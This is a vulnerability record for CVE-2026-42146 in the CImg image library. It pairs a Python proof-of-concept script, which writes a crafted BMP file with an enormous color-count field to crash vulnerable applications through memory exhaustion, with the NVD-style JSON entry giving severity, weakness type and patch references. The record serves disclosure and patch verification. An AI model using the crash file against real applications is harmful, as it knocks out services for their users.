CVE-2026-42146

import struct # PoC for CVE-2026-42146: CImg Out-of-Memory via BMP nb_colors # This script generates a crafted BMP file with a huge 'biClrUsed' value. # When loaded by a vulnerable version of CImg, it triggers an allocation failure. filename = "crash.bmp" # BMP File Header (14 bytes) bfType = b'BM' bfSize = 0 # Dummy size bfReserved1 = 0 bfReserved2 = 0 bfOffBits = 54 # Offset to pixel data (standard for BITMAPINFOHEADER) # DIB Header (BITMAPINFOHEADER - 40 bytes) biSize = 40 biWidth = 1 biHeight = 1 biPlanes = 1 biBitCount = 8 # 8-bit, implies a color table biCompression = 0 # BI_RGB biSizeImage = 0 biXPelsPerMeter = 0 biYPelsPerMeter = 0 biClrUsed = 0xFFFFFFFF # The malicious field: requesting a huge number of colors biClrImportant = 0 with open(filename, "wb") as f: f.write(bfType) f.write(struct.pack("<I", bfSize)) f.write(struct.pack("<H", bfReserved1)) f.write(struct.pack("<H", bfReserved2)) f.write(struct.pack("<I", bfOffBits)) f.write(struct.pack("<I", biSize)) f.write(struct.pack("<i", biWidth)) f.write(struct.pack("<i", biHeight)) f.write(struct.pack("<H", biPlanes)) f.write(struct.pack("<H", biBitCount)) f.write(struct.pack("<I", biCompression)) f.write(struct.pack("<I", biSizeImage)) f.write(struct.pack("<i", biXPelsPerMeter)) f.write(struct.pack("<i", biYPelsPerMeter)) # Write the malicious value for nb_colors (biClrUsed) f.write(struct.pack("<I", biClrUsed)) f.write(struct.pack("<I", biClrImportant)) print(f"Created {filename}. Open this with a vulnerable CImg application to trigger the crash.")

{"cve": {"id": "CVE-2026-42146", "sourceIdentifier": "[email protected]", "published": "2026-05-04T18:16:31.977", "lastModified": "2026-05-07T15:50:00.160", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "CImg Library is a C++ library for image processing. Prior to commit c3aacf5, the nb_colors field read from the BMP file header is used directly to compute an allocation size without validating it against the remaining file size. A crafted BMP file with a large nb_colors value triggers an out-of-memory condition, crashing any application that uses CImg to load untrusted BMP files. This issue has been patched via commit c3aacf5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-789"}]}], "references": [{"url": "https://github.com/GreycLab/CImg/commit/c3aacf5b96ac1e54b7af1957c6737dbf3949f6d3", "source": "[email protected]"}, {"url": "https://github.com/GreycLab/CImg/issues/477", "source": "[email protected]"}, {"url": "https://github.com/GreycLab/CImg/releases/tag/v.3.7.5", "source": "[email protected]"}, {"url": "https://github.com/GreycLab/CImg/security/advisories/GHSA-g54r-qmgx-c6fv", "source": "[email protected]"}, {"url": "https://github.com/GreycLab/CImg/issues/477", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}